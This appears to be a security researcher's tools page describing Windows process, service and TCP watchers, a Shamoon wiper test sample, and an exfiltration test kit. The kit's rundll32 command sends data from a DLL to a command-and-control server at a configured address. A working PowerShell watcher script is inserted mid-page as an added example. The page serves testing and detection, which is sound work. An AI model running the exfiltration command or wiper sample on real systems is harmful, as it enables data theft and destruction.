TOOLS & DOWNLOADS

udurrani

INFO


Recently, I decided to work on some tools and put them online. I am doing this for educational purposes and activities, so please use them wisely. Make sure you change the layout of your CMD / Console and make it wider to see the results better.

TCPInit_Tool

This provides TCP profiling. It only alerts on session initiation and won't alert on already established sessions, so one can easily find out all server communication.


O = OUTGOING, I = INCOMING

Start it as administrator and make sure you install the PCAP package, which is required for this tool to work. The PCAP install takes 5 seconds. The PCAP installer is within the same package (PASSWD: foo).


NewProcessWatch

The tool will take a snapshot of all running processes and only alert on new processes. Each new alert is shown ONLY once.


The output format is: TimeStamp, name of the process, PID of the process, PARENT_PID and PARENT_NAME

NewServiceWatch

The tool MUST be started as administrator. It is very similar to the NewProcessWatch tool; the only difference is that it takes a snapshot of the services and alerts on new ones.
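The NewProcessWatch and NewServiceWatch descriptions above both boil down to the same baseline-and-diff loop: take a snapshot, poll, and report only entries that were not in the previous snapshot. The PowerShell script below is an added example written for this page, not udurrani's tool; it covers both jobs from one elevated prompt and prints process alerts in the same field order as NewProcessWatch. The 2-second poll interval and the fields chosen for service alerts are assumptions.

```powershell
# Added example, not udurrani's NewProcessWatch/NewServiceWatch code.
# Assumes Windows PowerShell 5.1 or later; run from an elevated prompt so
# every process and service is visible. The poll interval is an assumption.
$PollSeconds = 2

function Get-ProcessSnapshot {
    # Key on PID plus creation time so a recycled PID still registers as new.
    $map = @{}
    foreach ($p in Get-CimInstance -ClassName Win32_Process) {
        $map["$($p.ProcessId):$($p.CreationDate)"] = $p
    }
    return $map
}

function Get-ServiceSnapshot {
    # Service names are unique per host, so the name is a sufficient key.
    $map = @{}
    foreach ($s in Get-CimInstance -ClassName Win32_Service) {
        $map[$s.Name] = $s
    }
    return $map
}

function Get-NewKeys {
    param([hashtable]$Baseline, [hashtable]$Current)
    # Emit only keys absent from the baseline. Each key is reported once,
    # because the baseline is replaced by the current snapshot after every poll.
    foreach ($k in $Current.Keys) {
        if (-not $Baseline.ContainsKey($k)) { $k }
    }
}

$knownProcs = Get-ProcessSnapshot
$knownSvcs  = Get-ServiceSnapshot
Write-Host ("Baseline taken: {0} processes, {1} services. Watching (Ctrl+C to stop)." -f $knownProcs.Count, $knownSvcs.Count)

while ($true) {
    Start-Sleep -Seconds $PollSeconds
    $stamp = Get-Date -Format 'yyyy-MM-dd HH:mm:ss'

    $procs = Get-ProcessSnapshot
    # PID -> name lookup for resolving parents within the same snapshot
    $nameByPid = @{}
    foreach ($p in $procs.Values) { $nameByPid[[int]$p.ProcessId] = $p.Name }

    foreach ($k in Get-NewKeys -Baseline $knownProcs -Current $procs) {
        $p = $procs[$k]
        $parentPid = [int]$p.ParentProcessId
        # The parent may have exited before this poll; say so instead of guessing
        $parentName = if ($nameByPid.ContainsKey($parentPid)) { $nameByPid[$parentPid] } else { '<exited>' }
        # Same field order as the page: TimeStamp, name, PID, PARENT_PID, PARENT_NAME
        Write-Output ('PROC  {0}, {1}, {2}, {3}, {4}' -f $stamp, $p.Name, $p.ProcessId, $parentPid, $parentName)
    }
    $knownProcs = $procs

    $svcs = Get-ServiceSnapshot
    foreach ($k in Get-NewKeys -Baseline $knownSvcs -Current $svcs) {
        $s = $svcs[$k]
        # Binary path and start mode are the first things to check on an unexpected service
        Write-Output ('SVC   {0}, {1}, {2}, {3}, {4}' -f $stamp, $s.Name, $s.State, $s.StartMode, $s.PathName)
    }
    $knownSvcs = $svcs
}
```

Keying processes on PID plus creation time matters: a short-lived process can exit and a newcomer can be assigned the same PID between two polls, and a PID-only baseline would silently swallow it. Because the script only sees a snapshot every poll, a process that starts and exits inside one interval is missed; that is the inherent limit of polling watchers like this one, and why the tool's own alerts should be read alongside an event-driven source such as process creation auditing where one is available.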





TestDataExfiltration

The tool has a server (CnC) and a DLL file. The server files run on macOS and Kali Linux.

TestServer_MAC_OS PortNumber
TestServer_KALI_LINUX_OS PortNumber

This starts a web server on the specified OS, listening on the provided PortNumber. If you use a well-known port (below 1024), run it with sudo.

On the Windows side you can run the DLL to send data to the web server, using the following command line:

rundll32 foo.dll,hello DATA_TO_SEND_TO_SERVER    // No spaces allowed :)

To make sure that the proper IP and port are provided, open a file called 'conf' in the same folder and add the following line:

IPAddress PortNumber

E.g. 1.2.3.4 80

Now run the rundll32 command.


The server output format is: TimeStamp, DataReceived, IPAddress in HEX and sourcePortNumber


Some other tools

RSearch.exe

Recursive file search

RSearch.exe PATH_TO_FOLDER




bHex.exe

Convert a binary file to hex

bHex.exe payload.exe newFileName


hBin.exe

Convert a hex file back to binary

hBin.exe hexFileName newBinary.exe


getIp.exe

Get all IP addresses

getIp.exe


getHash.exe

Get the hash of a file

getHash.exe PATH_TO_FILE






WANNA TEST SHAMOON???

The test scenario is very simple. Download all the files and unzip the package (PASSWD: foo). You will find two folders:

   TEST_SHAMOON_BIN
   0xff
TEST_SHAMOON_BIN has the main binary. Right click on it and run as administrator. Please note that this binary is for testing purposes ONLY. I have made it in a way that the wiper function won't overwrite your MBR. Each time you initiate the binary, it will drop a payload with a different hash and execute it.
The 0xff folder has the binary that will show you if 2nd stage files are dropped and if service(s) are started. The binary is called RUNME.exe. You MUST open CMD as admin and run this command. Shamoon doesn't run if the wiper service is already running. If you want to re-run, please remove the service first.

      To download (PASSWORD: foo)

Here is the flow





Other tools you can download (to detect Shamoon 2). Password as usual: foo

(shamoonfinder4-1.exe)
(shamoon-q_1-1.exe)

README

Password to all zip files: foo

I am going to add more tools here, including different malware payloads developed from scratch, e.g. PsExec, reverseShell with audio and video recorder, in-house ransomware, hooks and forensic tools.